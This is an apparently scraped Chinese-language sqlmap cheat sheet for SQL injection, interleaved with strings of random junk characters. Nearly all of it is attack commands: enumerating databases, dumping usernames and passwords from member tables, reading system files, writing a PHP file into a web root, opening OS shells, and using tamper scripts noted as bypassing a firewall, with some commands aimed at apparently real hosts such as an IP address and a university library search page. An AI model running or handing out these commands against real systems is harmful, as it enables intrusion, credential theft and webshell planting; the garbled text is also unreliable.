/pentest/database/sqlmap
& U& R: p7 o. j9 {" [$ V" ~* ^% l" z5 p
update :::::> in the folder after execute following order : svn update+ A1 {' ]4 S. @% M1 l X4 ]
# s- t C: U" J; p4 J: z3 `
sqlmap.py -r 1.txt --current-db
. |! Q2 T! L; w- @2 D q6 u6 t# ]2 M; H2 M. R/ W7 Z
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
4 [ d+ M" U- s$ R: Y7 x' O' Q7 M2 f b, T) e, m/ @6 S, g3 Y
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
/ h8 [( |% W0 Y( J猜解数据库2 Y. Y$ x# y9 |8 `! {! Q" v5 ]1 Z
./sqlmap.py -u "injection-url" --dbs7 D @$ o3 T$ D! w
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
& \, N! E* R' @
3 q* H3 V/ q) d( j猜解表名
! Y2 b& S7 J6 v7 t. s8 T/ D./sqlmap.py -u "injection-url" -D database_name --tables
2 {& X, M# ^! i! ~6 n2 d& L+ }' n' G3 P7 a. J; |; R
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
5 ~/ k! ?" m0 k. esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
# c2 E1 |; N2 u1 |& r1 X5 {$ i+ h- w5 H# |
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
+ I2 K4 |" K. R( Q& T$ l
# Z f$ n9 i2 e, E& U; Msqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
7 H- p! m I9 H; h' w) ]sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
6 B& J y# [0 ]! Fsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
! x$ e" }0 z4 E0 h2 d/ j# i _sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"6 R# L1 z* x) z+ P. g$ c( |
* m: m* |! b2 u w, Qsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"# g" \9 B: {( c
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
& R9 F9 O! r% S% [2 Zsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
5 l s5 F$ z9 e. P7 W; H7 X# [sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 U8 k3 t9 y d# Rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
X+ O# b% e+ m: Q) C' p3 R
- f M3 h5 ^ ~2 p# `( A! m% O3 xsqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
- i7 \3 v* O( B7 N& Esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"4 b: r2 w% U0 Y3 E# x
9 G* F$ @0 Z1 i: ]9 n8 N& x; z) n1 qsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
/ X9 Y7 _; X6 j& v" P猜解列名8 ]' Y% A& O; ^ g" K
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns* I1 @% G& X0 L
* [/ @4 H$ T8 J2 D1 ^4 Y4 h, k
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% P% N9 n! H0 \& n" \0 isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
2 }/ c, X3 F1 z' m: B! k- }sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"0 u. t* a0 y8 s5 k
2 W5 e# F3 u& h' p2 p8 Psqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"% |6 r" ^3 f, [6 r$ u `. x% T8 j
&submit=Go
( L% W K) V: K- p猜解值' I/ ~ q5 U$ j* Q
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
, ~# o1 y6 \$ z/ V9 ?# J6 E- K2 e, k$ G========================================================! P8 s* Z- L; g$ F: L \: Z
搜索表名中包括mana字符的
- T% U3 s9 B3 n5 n: X/sqlmap.py -u "injection-url" -T mana --search! d# r- [/ Z# Q% ?; f0 x+ l, @
返回一个交互式sql shell4 F1 y5 k% R. ~: A5 k i$ w
/sqlmap.py -u "injection-url" --sql-shell
5 ?: O2 S2 w& w! D. Z读取指定文件(需权限)
0 g& n) m) n) L! r/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* J8 Q1 O, Y; k5 }% ~+ K8 U1 |6 L查看当前 用户 及 数据库
# h* Z1 T# X0 V/sqlmap.py -u "injection-url" --current-user --current-db
+ p5 k( k1 T* Y) D7 U: A3 o9 \本地文件 写入 远程目标绝对路径 i' S5 E7 U1 ?6 Y
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
' m" E/ |7 u; w" u8 M$ Tsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
- x; ^/ A, _+ L+ Y' K9 [0 W6 D
. \! y$ S! s! {6 h8 u8 P- \3 Z8 ]$ Msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径7 S+ ?3 z# J$ V; {- n: E
查看某用的权限 p; D! V" a$ k
/sqlmap.py -u "injection-url" --privileges -U root# K" w' ~& a# Z- `; F
查看当前用户是否为dba# w: s* L; o& w" |
/sqlmap.py -u "injection-url" --is-dba" f! G% O5 f- C' m0 x5 e
读取所有数据库用户或指定数据库用户的密码
- J9 N9 }9 \1 @& U- K$ isqlmap.py -r 1.txt --users --passwords4 H3 h8 b/ a& [ h( B
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
& y5 @. M7 \% u/ p
3 L/ W" H) c, m. p8 e/sqlmap.py -u "injection-url" --passwords -U root
; k3 K; H' m! j
3 C. V }7 f% r--start&&--stop 与 --first&&--last 的区别8 {# ~8 G/ a6 C( N6 |
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
$ C! y" s& w5 ^* A) O1 d* D
! O, `& o6 z! S E从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
2 O' w7 f- T8 ?& E% G) U# r: K8 m9 H/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables( L& Z+ l+ G7 e* O
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
; n/ j' m" w! v0 v7 v8 `
6 n$ o" h2 D' I9 z. k执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)! p0 `5 z( i" J) G% ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"- |& |0 d" U9 z; F! p
. L# w8 r1 r% h* s' \- U' A |